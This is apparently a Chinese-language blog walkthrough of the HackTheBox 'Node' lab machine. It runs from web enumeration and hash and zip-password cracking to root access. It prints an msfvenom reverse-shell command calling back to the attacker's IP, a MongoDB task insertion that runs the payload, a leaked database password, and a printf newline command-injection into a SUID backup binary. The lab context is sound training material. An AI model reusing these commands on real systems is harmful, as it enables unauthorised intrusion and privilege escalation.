**
HackTheBox-Linux-Node-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/110
靶机难度:中级(4.3/10)
靶机发布日期:2017年10月24日
靶机描述:
Node focuses mainly on newer software and poor configurations. The machine starts out seemingly easy, but gets progressively harder as more access is gained. In-depth enumeration is required at several steps to be able to progress further into the machine.
作者:大余
时间:2020-05-28
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.58…
nmap仅发现开放了OpenSSH和Node.js…
访问web发现存在个登陆界面login…
丢着爆破,刚开始就报断点错误,根据做vulnhub靶机经验,这是半张笑脸…后面继续爆破就没任何目录信息…
查看前端代码,很多js文件…都查看了一番
发现存在/api/users/latest信息目录…
进入去掉latest,获得了0类的密匙信息…
通过爆破哈希值,获得了密码…这里测试了四个,只有0类可以登陆web…
登陆即可…
进入后download文件…直接下载是无法下载的一直循环下载…
这里需要开启本地代理进行下载…
下载完后读取发现是base64值,解码后读取文件类型,可看到是ZIP压缩文件…
解压提示需要密码…
这里直接利用fcrackzip暴力破解zip类型文件密码…
成功获得了密码…
解压后,在目录底层继续查看了jx文件内容…
发现了两个信息,mark用户名密码和backup_key…
利用mark用户名密码成功ssh登陆到靶机…
这里存在三个用户mark、frank、tom,直接列举了tom存在运行的进程…又是app.js
查看发现它访问了mongodb数据库,并执行了任务表中放置的所有任务,可看到setInterval函数,该函数可以在cmd值下执行任何操作…
命令:sudo msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -f elf -o dayushell.elf
利用MSF制作shell…然后scp上传…
命令:mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
use scheduler
show collections
db.tasks.insertOne({cmd:'/tmp/dayushell.elf'})
登录到mongodb,并使用语法插入要执行的有效负载…
过1分钟左右获得了反向外壳…
上传LinEnum.sh枚举,枚举SUID时,发现了backup二进制文件…和app.js内看到的backup_key感觉是相匹配的信息…
将backup下载到本地…
通过IDA查看发现,二进制文件的main函数检查有3个,如果返回false,它将跳转到左侧的块以完全退出…
测试给了它3个论点,输出了内容…
命令:strace ./backup 1 2 3
利用strace调用跟踪程序走向信息…可以看到程序正在尝试读取/etc/myplace/keys中的内容,去看看…
三个密匙…
返回查看backup_key,和前面keys对比,发现第一个密匙凭证一样的…果然是有关联的…
命令:ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /tmp/a
利用ltrace继续进行探测…这里科普下哈:
strace------跟踪进程的系统调用或信号产生的情况
ltrace-------跟踪进程调用库函数的情况
可以看到该目录使用magicword作为密码进行了压缩,然后该zip文件已进行base64编码,另外注意到有许多使用strchr()或strstr()的过滤器,这里可以绕过他们提权…
命令:./backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf '\n/bin/sh\necho OK')"
利用$(),printf和换行符的组合来注入命令成功获得了root权限,并获得了user_flag和root_flag信息…
这里backup还可以利用缓冲区溢出,或者我也提示了base64和magicword密码,可以直接提取root_base64值,然后获得root_flag…
web信息收集+hash爆破+ZIP爆破+mongodb数据库分析提权+信息枚举+backup二进制解析提权
由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。